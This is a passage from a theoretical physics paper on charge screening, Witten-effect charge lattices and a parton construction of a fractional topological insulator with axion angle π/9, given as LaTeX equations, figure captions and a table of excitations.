have trivial mutual statistics with respect to the condensates. In other words, Eq. (\[equation:mutual\_stat\]) holds between any excitation and $\varphi_1$, and also holds between any excitation and $\varphi_2$. By explicitly using the parameters of $\varphi_1$ and $\varphi_2$ in Table \[table:em\], the electric and magnetic charges of excitations are constrained by the following two equations: $$\begin{aligned} &qM=uN_a+vN_b\,, ~~q'M=u'N_a+v'N_b\,.\label{excitation_1} \end{aligned}$$ Therefore, a generic particle that has six independent charges $(N_A,N_a,N_b,M,N_m^a,N_m^b)$ is now completely determined by four of them $(N_A,M,N_m^a,N_m^b)$ if the particle is a deconfined excitation in the condensed phase. Keeping Eq. (\[constr\_5\]) in mind, $N_a$ and $N_b$ are fully determined by $M$: $ N_a=\frac{qv'-q'v}{\mathsf{Det}K}M\,,\, N_b=\frac{q'u-qu'}{\mathsf{Det}K}M\,$ which can be written as $$\begin{aligned} \mathbf{N}_e=MK^{-1}\mathbf{q}\label{NabM} \end{aligned}$$ by using the notation in Eqs. (\[define\_KNq1\],\[define\_KNq\]). ![(Color online) Schematic representation of the charge screening mechanism. Consider a composite particle carrying $N_A$ units of the EM ($A_\mu$) electric charge (i.e., $U(1)$ symmetry charge), $N_m^a$ units of magnetic charge of the $a_\mu$ field, and $N_m^b$ units of magnetic charge of the $b_\mu$ gauge field. Due to the condensates, $N_A$ is partially screened such that the net EM electric charge $Q$ is given by Eq. (\[NE1\]), which is different from $N_A$. In (a) the physics of Aharonov-Bohm effect in Eq. (\[ABPhase\]) is illustrated. An excitation (denoted by the blue ball) adiabatically moves along a closed trajectory and feels the EM magnetic flux $\Phi^A_M$, the electric flux $\Phi^a_e$ of the $a_\mu$ gauge field, and the electric flux of the $b_\mu$ gauge field. In (b), condensed particles $\varphi_1$ and $\varphi_2$ form a Debye-H[ü]{}ckel-like charge cloud around an excitation, providing the screening charge $Q_{\rm Debye}$ in Eq. (\[NE\_screen\]).[]{data-label="figure_flux"}](figure_flux.pdf){width="8cm"} As mentioned in Sec. \[sec:gauge\_strc\], the EM electric charge of a particle, $N_A$, is called the “bare” charge, which suggests that it will be partially screened due to the condensates. In order to clearly see the screening, we turn on the external EM field $A_\mu$ to probe the EM response and consider a spatial loop $C$. The total Aharonov-Bohm phase accumulated by an adiabatically moving test particle is given by (see Fig. \[figure\_flux\]): $$\begin{aligned} &\text{Aharonov-Bohm phase}\nonumber\\ = &\exp\{iN_A \Phi^A_M+i M \Phi^A_E+iN^a\Phi^a_m+iN^b\Phi^b_m\nonumber\\ &+iN^a_m \Phi^a_e+iN^b_m \Phi^b_e\}\,,\label{ABPhase}\end{aligned}$$ where $\Phi^A_E$ is EM electric flux piercing $C$, $\Phi_m^a$ and $\Phi_m^b$ are the $a$- and $b$-magnetic fluxes respectively. However, Eqs. (\[EM1\],\[EM1+\]) indicate that $\Phi^a_e$ and $\Phi^b_e$ depend linearly on the external EM magnetic flux $\Phi^A_M$. Solving Eqs. (\[EM1\],\[EM1+\]) leads to: $$\begin{aligned} &\Phi^a_e=2\pi\frac{kv'-k'v}{\mathsf{Det}K}-{ \Phi^A_M\frac{qv'-q'v}{\mathsf{Det}K}}\,,\label{screening1}\\ &\Phi^b_e=2\pi\frac{k'u-ku'}{\mathsf{Det}K}-{ \Phi^A_M\frac{q'u-qu'}{\mathsf{Det}K}}\,.\label{screening2} \end{aligned}$$ The terms that depend linearly on $\Phi_M^A$ correct the saddle point solutions in Eq. (\[phi\_ae\]). Taking Eqs. (\[screening1\],\[screening2\]) into account, the contribution to the Aharonov-Bohm phase due to the external EM gauge field can be isolated. Eq. (\[ABPhase\]) can be recast into $e^{iQ \Phi^A_M+\cdots}$, where $\cdots$ denotes the remaining terms that do not contain the factor $\Phi^A_M$, and, $Q$ is the *net EM electric charge*: $$\begin{aligned} Q=N_A-Q_{\rm Debye}\,, \label{NE1} \end{aligned}$$ where $$\begin{aligned} \!\!\!\! Q_{\rm Debye}\!=\!{ N_m^a\frac{qv'-q'v}{\mathsf{Det}K}\!+\!N_m^b\frac{q'u-qu'}{\mathsf{Det}K}}\!=\!\mathbf{N}_m^T K^{-1}\!\mathbf{q}\,.\!\!\!\label{NE_screen} \end{aligned}$$ denotes the charge carried by the Debye-H[ü]{}ckel-like screening cloud (see Fig. \[figure\_flux\]). The matrix $K$, vector $\mathbf{N}_m,$ and the vector $\mathbf{q}$ are defined in Eq. (\[define\_KNq\]). Concerning the screening charge, there are two interesting limits. First, the total EM electric charge of each condensate is zero, i.e., $Q=0$ for both condensates $\varphi_1$ and $\varphi_2$ (see Table \[table:em\]). For example, we have $Q_{\rm Debye}=q$ for $\varphi_1$, which completely screens its bare EM electric charge $N_A=q$. Second, let us consider an intrinsic excitation whose bare EM electric charge vanishes, $N_A=0$. Its net EM electric charge $Q$ is nonzero and completely given by that of the Debye screening cloud: $ Q=-Q_{\rm Debye}= - \mathbf{N}_m^T K^{-1}\!\mathbf{q} $. In fact, charge fractionalization in Abelian FQH states can also be understood via the above Aharonov-Bohm thought experiment. As an example, let us derive the fractionalization of charge in the $\nu=1/3$ Laughlin state. The effective field theory is described by the following Lagrangian: $$\begin{aligned} \mathcal{L}=\frac{3}{4\pi}a_\mu\partial_\nu a_\lambda \epsilon^{\mu\nu\lambda}+\frac{1}{2\pi}A_\mu \partial_\nu a_\lambda\epsilon^{\mu\nu\lambda}\,. \end{aligned}$$ Here the gauge field $a_\mu$ is a dual description of the electron current $J_\mu$: $J_\mu=\frac{1}{2\pi}\partial_\nu a_\lambda \epsilon^{\mu\nu\lambda}$. The second term in the Lagrangian $\mathcal{L}$ means that each electron carries one unit of electric charge. Excitations in FQH states are labeled by gauge charges of the $a_\mu$ gauge group, since they minimally couple to $a_\mu$. In this sense, let us consider the Aharonov-Bohm experiment for an excitation that carries one unit of gauge charge of $a_\mu$. The Aharonov-Bohm phase is given by $e^{i\Phi_a}$ where $\Phi_a$ is the $a_\mu$ magnetic flux felt by the excitation. In the hydrodynamical field theory $\mathcal{L}$, $\frac{1}{2\pi}\Phi_a$ corresponds to the electron density. By studying the equation of motion of $a_\mu$ in $\mathcal{L}$, we obtain: $\Phi_A=3\Phi_a$. Physically, this identity means that each electron effectively corresponds to three units of magnetic flux of the background EM field, which is nothing but the definition of filling fraction $\nu=\frac{1}{3}$. Thus, the Aharonov-Bohm phase accumulated by the excitation is identical to: $e^{i\Phi_a}=e^{i\frac{1}{3}\Phi_A}$. The coefficient $\frac{1}{3}$ indicates that the excitation in the presence of $A_\mu$ behaves as an electrically charged particle with $\frac{1}{3}$ charge. Let us come back to our 3D system. We introduce the following two equivalent criteria for charge fractionalization: \[Criterion for charge fractionalization\] Charge fractionalization exists if excitations with zero $M$ and fractionalized $Q$ exist. \[crt\_charge\_1\] and, \[Criterion for charge fractionalization\] Equivalently, charge fractionalization exists if the EM magnetic charge $M$ of excitations is quantized in units of an integer $w>1$, i.e., $M=0,\pm w, \pm 2w,\cdots$. \[crt\_charge\_2\] In Appendix \[appendix\_dirac\], the equivalence of the above two criteria is explained by using the well-known Dirac-Zwanziger-Schwinger quantization condition. The requirement of $M=0$ in Criterion \[crt\_charge\_1\] can be understood as follows. Typically, in the presence of $M$, excitations can potentially carry a fractionalized $Q$ due to the Witten effect. However, this does not mean our 3D quantum system is fractionalized. The topological insulator (TI) is a typical example. If a single EM monopole ($M=1$) is inserted into the bulk, there is a half-charge cloud surrounding the monopole [@Qi2008; @franz]. However, since the TI can be realized in a non-interacting band insulator we do not consider it to be fractionalized. In order to highlight the set of excitations with $M=0$, we introduce the notion of intrinsic excitations and intrinsic charge lattice: \[[Intrinsic excitations]{} and [intrinsic charge lattice]{}\] Intrinsic excitations are excitations with zero EM magnetic charge, i.e., $M=0$; the intrinsic charge lattice is a special 3D charge lattice with zero EM magnetic charge, i.e., $M=0$.\[dfn\_intrinsic\_exc\] One can verify that $Q_{\rm Debye}$ in Eq. (\[NE1\]) is the *unique* source of charge fractionalization. In other words, $N_A$ in Eq. (\[NE1\]) is always integer-valued when $M=0$ (see Appendix \[appendix\_na\_integer\] for details); charge fractionalization exists if and only if $Q_{\rm Debye}$ is fractional when $M=0$. Finally, we show that the Debye charge cloud $Q_{\rm Debye}$ in Eq. (\[NE\_screen\]) can also be understood in a more formal way, i.e., from a topological $BF$ field theory. Without loss of generality, we consider the London limit (i.e., deep in the confined phase) such that the amplitude fluctuations of $|\varphi_I|$ are negligible. In this limit, we may dualize $S_{\rm GL}$ in Eq. (\[equation\_free\_energy\]) into a two-component topological $BF$ field theory [@horowitz89]: $$\begin{aligned} S=&i\int \frac{1}{2\pi} \mathscr{B}^T \wedge K d \mathscr{A}+i\int \frac{1}{2\pi} \mathbf{q}^T \mathscr{B}\wedge d A+\mathcal{S}_{ex},\label{BFaction}\end{aligned}$$ where we define the two-component vectors $\mathscr{B}=\bpm \mathcal{B},\mathcal{B}'\epm^T$ and $\mathscr{A}=\bpm \tilde{a},\tilde{b}\epm^T$, and use a differential form notation. Here, $\mathcal{B}$ and $\mathcal{B}'$ are two Kalb-Ramond $2$-form gauge fields introduced as a result of the particle-vortex line duality transformation in (3+1)D [@savit]. Physically, they are related to the supercurrents of the condensates $\varphi_1$ and $\varphi_2$, respectively, via: $J^{\varphi_1}=\frac{1}{2\pi} \star d\mathcal{B}\,,\,{J^{\varphi_2}}=\frac{1}{2\pi} \star d \mathcal{B}'\,, $ where $\star$ is the usual Hodge-dual operation. Since the energy gap in the bulk of the topological $BF$ field theory is effectively infinite, the term $\mathcal{S}_{ex}$ is added by hand in order to take into account the point-like excitations labeled by $\mathbf{N}_m=(N_m^a,N_m^b)^T,$ and the loop excitations labeled by the integer vector $\mathbf{L}=(\ell,\ell')^T$ (see Definition \[dfn\_loops\]): $$\begin{aligned} \mathcal{S}_{ex}=i \int \mathbf{N}_m^T \mathscr{A} \wedge \star j+i \int\mathbf{L}^T \mathscr{B} \wedge \star \Sigma\,,\label{BFex}\end{aligned}$$ where the vector $j$ denotes the composite excitation current, and the tensor $\Sigma$ denotes the loop excitation current. Integrating out the dynamical fields $\mathscr{A}$ and $\mathscr{B}$ yields an effective theory for $j$ and $\Sigma$ in the presence of the external EM field $A_\mu$: $$\begin{aligned} \!\!\!\!S_{\rm eff}\!= \!i\mathbf{N}_m^T K^{-1}\!\mathbf{q} \!\!\int \! j\!\wedge \star A +\!i 2\pi\mathbf{N}_m^TK^{-1}\mathbf{L} \! \!\int \!\Sigma \wedge d^{-1}\,j.\!\! \label{eqn:effective}\end{aligned}$$ It is remarkable that the first term in the effective action (\[eqn:effective\]) is nothing but the Debye screening charge cloud $Q_{\rm Debye}$ defined in Eq. (\[NE\_screen\]). Thus, $Q_{\rm Debye}$ is a topological property of an excitation. The second term represents the long-range Aharonov-Bohm statistical interaction between fluxes and particles. The operator $d^{-1}$ is a formal notation defined as the operator inverse of $d$, whose exact form can be understood in momentum space by Fourier transformation. The coefficient $\mathbf{N}^T_m K^{-1} \mathbf{L}$ gives rise to the charge-loop braiding statistics $\vartheta^{cl}$ between composite particles with quantum number $\mathbf{N}_m$ and loop excitations with electric fluxes $\mathbf{\Phi}_e=2\pi(K)^{-1}\mathbf{L}$ due to Eq. (\[eq:phie\_L\]): $$\begin{aligned} \vartheta^{cl}=2\pi\mathbf{N}^T_m K^{-1} \mathbf{L}=\mathbf{N}^T_m \mathbf{\Phi}_e \,.\label{eq:cltheta}\end{aligned}$$ Now that we have carefully developed a theory that describes topological phases in the presence of $U(1)$ composite condensates we will use the results to construct fractionalized 3D topological insulators with time-reversal symmetry. Fractional topological insulators {#sec:theta} ================================= In this section, we will study 3D topological phases of matter with non-vanishing axion angle $\Theta$. The presence of nontrivial values of $\Theta$ lead to several observable phenomena including a surface quantum Hall effect, and the celebrated Witten effect: a magnetic monopole will bind a electric charge. For free-fermion time-reversal invariant topological insulators, the angle is $\pi \text{ mod } 2\pi$ [@Qi2008]. In fractionalized states where strong interactions and correlations are taken into account, in principle, the axion angle can be fractional (i.e., $\Theta/\pi$ is not integral) while time-reversal invariance is still maintained [@maciejkoFTI; @maciejko_model; @maciejko2015; @swingle2011; @YW13a]. Such topological phases are called “fractional topological insulators” (FTI). In Ref. , FTIs were obtained via parton constructions where the partons themselves carry fractional EM electric charges, and the internal gauge fields are in the Coulomb phase where gauge fluctuations are weak and the photon(s) are gapless. In a different non-fractionalized state where $U(1)\times U(1)\rtimes Z_2$ symmetry is considered [@bti6], the $\Theta$ term may signal a mutual Witten effect where a monopole of one U(1) gauge group induces an electric charge of another $U(1)$ gauge group. In the following, we will explore [FTI]{}s via the parton construction introduced in Sec. \[sec:gauge\_strc\]. However in Sec. \[sec\_FTI\_Coulomb\], we shall first study charge lattices for which all partons occupy topological insulator bands and the internal gauge fields are in the Coulomb phase. The resulting state is a non-fractional topological insulator (i.e., $\Theta=\pi$) and there are two massless gauge bosons in the bulk. In order to obtain a gapped bulk and a fractional $\Theta$, in Sec. \[sec\_FTI\] we again assume that all partons occupy topological insulator bands and then we condense certain composites (see $\varphi_1$ and $\varphi_2$ of [FTI]{} in Table \[table:em\]). We focus on a concrete example and show that the resulting state is a [FTI]{} with time-reversal symmetry and $\Theta=\frac{\pi}{9}$ (c.f. Eq. (\[eqn:new\_Theta\_reduced\])). As a side result, in Appendix \[appendix\_Gamma\_trivial\_1\], we show that the ansätze in which all partons are in a topologically trivial band structure always gives a topologically trivial state with $\Theta=0$ regardless of the condensate structure. Topological insulators in the Coulomb phase {#sec_FTI_Coulomb} ------------------------------------------- In the following, we consider partons occupying non-trivial 3D topological insulator bands (i.e., $\theta=\pi$). Previously, it was shown that partons with $\theta=\pi$ can potentially support [a]{} fractional $\Theta$ angle if [the]{} Coulomb phase is considered, and a special parton representation of an electron is used [@maciejkoFTI]. In the Coulomb phase, the dynamical gauge fields $a_\mu$ and $b_\mu$ are weakly fluctuating and non-compact; hence, the standard perturbative analysis is applicable. Integrating [out]{} the partons [to quadratic order in the gauge fields [@Qi2008], we obtain the following effective action $S_{\rm eff}$:]{} $$\begin{aligned} \!S_{\rm eff}\!=\!& \!\int\! d^4x\frac{\theta}{32\pi^2}\left(g_a f^a_{\mu\nu}\!+\!eG_{\mu\nu}\right) \! \!\left(g_af^a_{\lambda\rho}\!+\!eG_{\lambda\rho}\right)\!\ep + \! \!\int \!d^4x\frac{\theta}{32\pi^2}\!\!\left(-g_af^a_{\mu\nu}\!-\!g_bf^b_{\mu\nu}+eG_{\mu\nu}\right)\nonumber\\ &\times \! \! \left(-g_af^a_{\lambda\rho}\!-\!g_bf^b_{\lambda\rho}\!+\!eG_{\lambda\rho}\right)\!\ep+\!\!\int d^4x\frac{\theta}{32\pi^2}\left(g_bf^b_{\mu\nu}-eG_{\mu\nu}\right) \! \!\left(g_bf^b_{\lambda\rho}-eG_{\lambda\rho}\right)\ep+S_\text{Maxwell}\,, \end{aligned}$$ where $\theta=\pi$. The quantities $f^a_{\mu\nu}=\partial_\mu a_\nu-\partial_\nu a_\mu$ and $f^b_{\mu\nu}=\partial_\mu b_\nu-\partial_\nu b_\mu$ are field strength tensors of $a_\mu$ and $b_\mu$ respectively. Both $a_\mu$ and $b_\mu$ are smooth variables and do not support monopole configurations. $G_{\mu\nu}$ is defined as: $G_{\mu\nu}=F_{\mu\nu}-\frac{2\pi}{e}S_{\mu\nu}$, where $F_{\mu\nu}=\partial_\mu A_\nu-\partial_\nu A_\mu$, $A_\mu$ is smooth external EM field, and the tensor $S_{\mu\nu}$ forms the EM monopole current via: $M_\mu=\frac{1}{2}\ep \partial_\nu S_{\lambda\rho}\, $. The constant $e^2$ denotes the fine structure constant of the EM field $A_\mu$. The coupling constants $g_{a,b}$ of the $a_\mu$ and $b_\mu$ gauge fields are written explicitly and $0<g_a,g_b\ll 1$ in the Coulomb phase. $S_\text{Maxwell}$ includes all non-topological terms (Maxwell-type) of $a_\mu,b_\mu$ and $A_\mu$. Since both $a_\mu$ and $b_\mu$ are smooth variables, all terms of the form $f^a\wedge f^a$, $f^a\wedge f^b$, and $f^b\wedge f^b$ are total-derivative terms that can be neglected in the bulk effective field theory. The term $-\frac{4\theta \,e \,g_b}{32\pi^2}f^b_{\mu\nu} G_{\lambda\rho}\ep=\frac{\theta g_b}{\pi}M_\mu b_\mu$ implies that $M_\mu$ carries integer gauge charge of the $U(1)_b$ gauge group by noting that $\frac{\theta}{\pi}=1$. As such, after integrating $a_\mu,b_\mu$ $S_{\rm eff}$ reduces to: $$\begin{aligned} S_{\rm eff}=&\frac{\Theta e^2}{32\pi^2}\int d^4x G_{\mu\nu}G_{\lambda\rho}\ep+\cdots\,,\label{Effective_Action_Coulomb}\end{aligned}$$ where $\Theta=3\pi$. The terms represented by $\cdots$ include the long-range Coulomb interactions between the monopole currents $M_\mu$ mediated by the $b_\mu$-photons, and other non-topological terms. Since the periodicity of $\Theta$ is still $2\pi$ in the absence of charge fractionalization, $\Theta$ reduces to $\pi$ by a $2\pi$ periodic shift. In summary, the resulting state shows a $\Theta$ angle that is the same as a free-fermion topological insulator. The bulk admits two gapless, electrically neutral excitations, i.e., photons of the $U(1)_a$ and $U(1)_b$ gauge fields. Fractional topological insulators in the composite condensation phase {#sec_FTI} --------------------------------------------------------------------- The charge [lattice]{} in Sec. \[sec\_FTI\_Coulomb\] was obtained from the assumptions that (i) [partons]{} occupy $\theta=\pi$ topological insulator bands, and (ii) the internal gauge fields are in the Coulomb phase. However, the [resulting]{} phase supports a non-fractional $\Theta=\pi$ angle and the bulk spectrum is gapless. In the following we consider composite condensation phases as discussed in Sec. \[sec:gauge\_strc\] instead of the Coulomb phase. When the partons are in topological insulator bands the [resulting]{} phase can support fractionalized $\Theta$ angles and a *fully* gapped bulk. [Let]{} us start with the scenario that all partons occupy topological insulator bands (i.e., $\theta=\pi$) and then consider composite condensations. One can prove that parameters $u,v,u',v',q,q'$ must be even: $$\begin{aligned} u,v,u',v',q,q'\in\Z_{\rm even}\label{uvuvqq_even}\,{,}\end{aligned}$$ in order to satisfy the set of constraints given by Eqs. (\[constr\_1\],\[constr\_3\]). [We obtain the following relations]{} via Eqs. (\[eqn:transition\_matrix\],\[eqn:transition\_matrix1\],\[Nnf1\]) ($\theta=\pi$): $$\begin{aligned} n^{f1}-n^{f2}=&N_a-N^a_m-\frac{1}{2}N^b_m\,,\label{N_a_n1n2}\\ n^{f3}-n^{f2}=&N_b-N^b_m-\frac{1}{2}N^a_m+M\,,\label{N_b_n1n2}\\ n^{f1}+n^{f2}-n^{f3}=&N_A+N^b_m-\frac{3}{2}M\,.\label{NA_is_integer}\end{aligned}$$ In order to see whether or not there is charge fractionalization (Definition \[crt\_charge\_1\]), we may check the value of $Q$ defined in Eq. (\[NE1\]) when $M=0$. Then, Eq. (\[NA\_is\_integer\]) indicates that $N_A$ is always integer-valued when $M=0$ by noting that $n^{fi}$ and $N_m^b$ are integer-valued. Thus, we should further check whether or not $Q_{\rm Debye}$ defined in Eq. is fractional when $M=0$. In principle, one may deduce $\Theta$ as a function of the parameters $(u,v,u',v',q,q',\theta)$. However, such a generic discussion is technically intricate and not illuminating. Instead, we will proceed further with a concrete example as a proof of principle (see Table \[table:em\]): $ u=2,v=2,u'=4,v'=10,q=2,q'=2\,$. In terms of the matrix notation defined in Eq. (\[define\_KNq1\]), we have: $$\begin{aligned} K=\bpm 2 & 2 \\ 4& 10\epm, ~~~~\mathbf{q}=\bpm 2\\2\epm\,.\label{define_KNq12345}\end{aligned}$$ From Table \[table:em\], we see that $\varphi_1$ is a bosonic bound state of two $a_\mu$ magnetic monopoles, two $b_\mu$ magnetic monopoles, one $f^1$ parton, four $f^2$ partons, and one $f^3$ parton. $\varphi_2$ is a bosonic bound state of four $a_\mu$ magnetic monopoles, ten $b_\mu$ magnetic monopoles, nine $f^2$ partons, and three hole-like $f^3$ partons. By using Eq. (\[NabM\]), it is straightforward to work out the relation between $N_{a,b}$ and $M$: $$\begin{aligned} N_a=\frac{4}{3}M\,,~~~~~ N_b=-\frac{1}{3}M\,{,}\label{example_NaNb}\end{aligned}$$ which must be satisfied for all excitations. Plugging Eq. (\[example\_NaNb\]) into Eqs. (\[N\_a\_n1n2\],\[N\_b\_n1n2\]), we end up with $$\begin{aligned} n^{f1}-n^{f2}=&\frac{4}{3}M-N^a_m-\frac{1}{2}N^b_m\,,\label{N_a_n1n2111}\\ n^{f3}-n^{f2}=&\frac{2}{3}M-N^b_m-\frac{1}{2}N^a_m\,.\label{N_b_n1n2111}\end{aligned}$$ It is obvious that the single parton $f^i$ whose charges are shown in Table \[table:em\] is confined since Eqs. (\[N\_a\_n1n2111\],\[N\_b\_n1n2111\]) are not satisfied simultaneously. By noting that $n^{fi}, N_m^a,N_m^b,M$ are integer-valued, Eqs. (\[N\_a\_n1n2111\],\[N\_b\_n1n2111\]) require that: $$\begin{aligned} &N_m^a, N_m^b\in\Z_{\rm even} \,;~~~\,M=0,\pm3,\pm6,\pm9,\cdots\,.\label{double_m_charge}\end{aligned}$$ Therefore, the quantization of $M$ is modified compared to the usual quantization $M=0,\pm1,\pm2{,\ldots}$ found in the vacuum and a non-fractionalized TI. A direct consequence is that an $M=1$ particle is not allowed to pass through [the]{} [FTI]{}, which is illustrated in Fig. \[figure\_ti\]. ![(Color online) Throwing three external EM magnetic monopoles (denoted by blue balls) in vacuum into topological materials TI and [FTI]{}. Only [the]{} EM magnetic monopole with [$3k$, $k\in\Z$]{} magnetic charge shown in (\[double\_m\_charge\]) can penetrate the [FTI]{} boundary in our example. An EM magnetic monopole with $M=1,2$ will be completely reflected on the [FTI]{} boundary, as shown by the leftwards arrows. The shadow of each ball pictorially denotes the polarization charge cloud induced by the Witten effect.[]{data-label="figure_ti"}](figure_ti.pdf){width="8.6cm"} We may use $n^{f1}$, $n^{f2}$, $n^{f3}$, and $M$ to uniquely label all excitations. Solving Eqs. (\[N\_a\_n1n2111\],\[N\_b\_n1n2111\]) gives rise to: $$\begin{aligned} &N_m^a=\frac{4}{3}M-\frac{4}{3}n^{f1}+\frac{2}{3}n^{f2}+\frac{2}{3}n^{f3}\,,\label{equation_NMA}\\ &N_m^b=\frac{2}{3}n^{f1}+\frac{2}{3}n^{f2}-\frac{4}{3}n^{f3}\,.\label{equation_NMB}\end{aligned}$$ By using the above two equations, $N_A$ in Eq. (\[NA\_is\_integer\]) and $Q_{\rm Debye}$ in Eq. (\[NE\_screen\]) can be expressed as: $$\begin{aligned} &N_A=\frac{1}{3}n^{f1}+\frac{1}{3}n^{f2}+\frac{1}{3}n^{f3}+\frac{3}{2}M\,,\\ &Q_{\rm Debye}=-2n^{f1}+\frac{2}{3}n^{f2}+\frac{4}{3}n^{f3}+\frac{16}{9}M\,.\end{aligned}$$ The net EM electric charge $Q$ is defined as $N_A-Q_{\rm Debye}$ and thus is given by: $$\begin{aligned} Q=\frac{7}{3}n^{f1}-\frac{1}{3}n^{f2}-n^{f3}-\frac{5}{18}M\,.\label{Q_expression}\end{aligned}$$ Thus, the quantization of $Q$ is given by: (see Appendix \[appendix\_gamma\_stat4321\_new\]) $$\begin{aligned} &Q=0,\pm\frac{1}{3},\pm\frac{2}{3},\pm1\,,\cdots \,\,\,\text{ when } \frac{M}{3}=0,\pm2,\cdots\,,\label{Q_fractional_M0}\\ &Q=0,\pm\frac{1}{6},\pm\frac{3}{6},\pm\frac{5}{6}\,,\cdots \,\,\, \text{ when } \frac{M}{3}=\pm1,\pm3,\cdots.\label{Q_fractional_M1}\end{aligned}$$ Eq. (\[Q\_fractional\_M0\]) indicates that the intrinsic excitations of [the]{} [FTI]{} (Definition \[dfn\_intrinsic\_exc\]) carry $1/3$ quantized EM electric charge. In other words, the [FTI]{} bulk supports charge fractionalization (Criterion \[crt\_charge\_1\]). Due to the quantization of $M$ in Eq. (\[double\_m\_charge\]), Criterion \[crt\_charge\_2\] is automatically satisfied. Eq. (\[Q\_fractional\_M1\]) indicates that the 2D $(M,Q)$ lattice is tilted by an angle $\frac{5}{18}M$. More precisely, an axion angle $\Theta$ can be defined as: $\Theta=-\frac{5}{9}\pi$ by identifying $- \frac{5}{18}M=\frac{\Theta}{2\pi}M$. This $M$-dependent EM electric charge is a known consequence of the Witten effect [@witten1; @Qi2008; @franz]. [The]{} self-statistics of excitations (i.e., either fermionic or bosonic) can also be derived as a function of $(n^{f1},n^{f2},n^{f3},M)$. For this purpose, let us start with $\Gamma$ defined in Eq. (\[eq:stat123\]) and take Eq. (\[double\_m\_charge\]) into account. Therefore, the first two terms of Eq. (\[eq:stat123\]) are even and can be removed giving: $$\begin{aligned} \Gamma=&(M+1)(n^{f1}+n^{f2}+n^{f3})\,,\label{eq:stat4321}\end{aligned}$$ where $-n^{f3}$ is also changed to $n^{f3}$ leaving the even-odd property of $\Gamma$ unaltered. In analogy to a TI, time-reversal symmetry should also be [maintained]{}. From the point of view [of the charge lattice]{}, time-reversal symmetry is a reflection [symmetry]{} $M\rightarrow -M$ [that keeps the]{} net EM electric charge and self-statistics invariant[:]{} $Q\rightarrow Q$[,]{} $\Gamma\rightarrow \Gamma+\text{even integer}$. [One possible definition of time-reversal symmetry that satisfies these properties is as follows,]{} $$\begin{aligned} & \mathcal{T}n^{f1} \mathcal{T}^{-1}= n^{f1}-\frac{1}{3}M\,,~ \mathcal{T}n^{f2} \mathcal{T}^{-1} =n^{f2}-\frac{2}{3}M\,, \\ & \mathcal{T}n^{f3} \mathcal{T}^{-1}= n^{f3}\,, ~~\mathcal{T}M \mathcal{T}^{-1}=-M\,, \end{aligned}$$ where $\mathcal{T}$ denotes [the]{} time-reversal operator. It can be [verified]{} that $Q$ is invariant and $\Gamma$ is only changed by [an]{} even integer, thus leaving its even-odd property unaltered. [Using]{} the above transformations, we may also derive the transformations below: $$\begin{aligned} \mathcal{T}N^a_m \mathcal{T}^{-1}=N_m^a-\frac{8}{3}M\,,~ \mathcal{T}N^b_m \mathcal{T}^{-1}=N_m^b-\frac{2}{3}M\,. \end{aligned}$$ The shifted amounts $-\frac{8}{3}M$ and $-\frac{2}{3}M$ are even integers, which guarantees the transformed $N^{a,b}_m$ are still even as required by Eq. (\[double\_m\_charge\]). [A time-reversed excitation is still an excitation, in the sense that the]{} transformed electric and magnetic charges also satisfy all equations that are satisfied by the excitation before [time reversal]{}. Geometrically, [this]{} means that after the above transformations, the new particle is still on the 4D charge lattice. Furthermore, $Q$ and [$\Gamma$]{} are unchanged. From this geometric point of view, the time-reversal symmetry defined above effectively acts like a subgroup of [the point group]{} of the 4D charge lattice. $n^{f1}$ $n^{f2}$ $n^{f3}$ $M$ $N_A$ $Q_{\rm Debye}$ $Q$ $N_m^a$ $N_m^b$ $\Gamma$ ------------------------ ---------- ---------- ---------- ----- ---------------- ----------------- ---------------- --------- --------- ---------- Elementary charge $1$ $0$ $2$ $0$ $1$ $\frac{2}{3}$ $\frac{1}{3}$ $0$ $-2$ F Elementary charge $2$ $9$ $1$ $0$ $4$ $\frac{10}{3}$ $\frac{2}{3}$ $4$ $6$ B Electron $1$ $1$ $1$ $0$ $1$ $0$ $1$ $0$ $0$ F Elementary EM monopole $0$ $0$ $0$ $3$ $\frac{9}{2}$ $\frac{16}{3}$ $-\frac{5}{6}$ $4$ $0$ B An example with $M=3$ $1$ $1$ $1$ $3$ $\frac{11}{2}$ $\frac{16}{3}$ $\frac{1}{6}$ $4$ $0$ B An example with $M=3$ $2$ $1$ $0$ $3$ $\frac{11}{2}$ $2$ $\frac{7}{2}$ $2$ $2$ B An example with $M=6$ $1$ $1$ $1$ $6$ $10$ $\frac{32}{3}$ $-\frac{2}{3}$ $8$ $0$ F An example with $M=6$ $2$ $1$ $0$ $6$ $10$ $\frac{22}{3}$ $\frac{8}{3}$ $6$ $2$ F : Examples of excitations in our [FTI]{}. The electric and magnetic charges are explicitly shown. “F” is short for “fermionic” where $\Gamma$ is odd. “B” is short for “bosonic” where $\Gamma$ is even. We call an elementary charge an intrinsic excitation (Definition \[dfn\_intrinsic\_exc\]) that [carries]{} $Q=1/3$ or $Q=2/3$ EM electric charge, in analogy to the fractionalized charge excitation[s]{} in [the]{} $\nu=1/3$ [FQH]{} state. [The]{} two elementary charges in the Table are just two concrete examples, and there are many other excitations that carry $Q=1/2,2/3$ and $M=0$. [The]{} elementary EM monopole is an excitation that carries the minimal nonzero EM magnetic charge $M=3$ and do[es]{} not contain any partons (i.e., $n^{fi}=0$, $\forall i=1,2,3$). [A]{} nonzero $M$ can be externally added into the bulk in order to probe the EM response (see Definition \[dfn\_intrinsic\_exc\]). [The]{} minimal quantum of charge fractionalization is $\frac{1}{3}$ determined by the [intrinsic excitations]{}, i.e., Eq. (\[Q\_fractional\_M0\]) rather than Eq. (\[Q\_fractional\_M1\]).[]{data-label="table:FTI"} An important result is that the [FTI]{} with $\Theta=-\frac{5}{9}\pi$ is actually topologically equivalent to the [FTI]{} with $\Theta=\frac{1}{9}\pi$ by [a]{} periodic shift. The minimal choice of $\Theta$ for our [FTI]{} phase is given by: $$\begin{aligned} \Theta=\frac{1}{9}\pi \text{ mod }\frac{2}{9}\pi\,.\label{eqn:new_Theta_reduced}\end{aligned}$$ [To understand]{} this result, let us revisit the self-statistics $\Gamma$ in Eq. (\[eq:stat4321\]). In fact, $\Gamma$ can be reformulated as a unique function of $M$ and $Q$: (see Appendix \[appendix\_gamma\_stat4321\_new\] for details) $$\begin{aligned} \Gamma=&3(M+1)(Q-\frac{\Theta}{2\pi}M)\,,\label{eq:stat4321_new}\end{aligned}$$ where $\Theta$ is given by Eq. (\[eqn:new\_Theta\_reduced\]). We manifestly see that the even-odd property of $\Gamma$ is unaltered by the *minimal* shift $\Theta\rightarrow \Theta+\frac{2}{9}\pi$. $\Gamma$ is pictorially illustrated in Fig. \[figure\_theta\](b) and we can see that geometrically, $\Theta$ describes how tilted the charge lattice is with respect to its initial orientation (Fig. 